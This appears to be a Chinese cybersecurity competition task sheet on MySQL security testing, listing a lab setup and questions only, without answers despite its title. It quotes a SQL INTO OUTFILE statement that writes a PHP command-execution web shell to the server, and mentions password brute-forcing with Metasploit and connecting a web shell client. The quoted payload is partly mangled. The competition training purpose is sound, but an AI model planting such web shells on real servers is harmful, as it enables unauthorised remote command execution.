2022年网络安全比赛试题解析--Mysql安全测试

网络安全比赛试题解析–Mysql安全测试

任务：mysql安全测试

服务器场景名称：WebServ2008

服务器场景操作系统：Microsoft Windows2008 Server

服务器场景用户名：administrator；密码：未知

系统场景：phpstudy

渗透机场景：kali

渗透机用户名：root，密码：toor

渗透机场景：win7

渗透机用户名：administrator；密码：123456

1. 利用渗透机kali中的工具确定mysql的端口，将mysql端口作为flag提交；
   

测试：

2. 管理者曾在web界面登陆数据库，并执行了select ‘

   \';system($_GET[\'cmd\']); echo \'

   \'; ?>’ INTO OUTFILE 'C:/phpstudy/test1.php’语句，结合本执行语句使用dos命令查看服务器的详细配置信息，并将服务器的系统型号作为flag提交；
   

3. 利用渗透机kali中的msf工具使用root目录下password.txt字典文件破解MySQL的密码，并将破解mysql的密码所需的模块当作flag提交(账户为root);

4. 利用渗透机kali中的msf工具使用root目录下password.txt字典文件破解MySQL的密码，并将mysql的密码当作flag提交(账户为root);

5. 利用上题中的数据库账户密码在登陆数据库，通过select ‘’************ 'C:/phpstudy/shell.php’语句向服务器提交名为shell.php的一句话木马，将语句中*号的明文作为flag提交（*为大写字母或者空格）；

6. 使用菜刀连接上题中的shell.php,下载服务器根目录下的压缩包，将压缩包中的flag提交；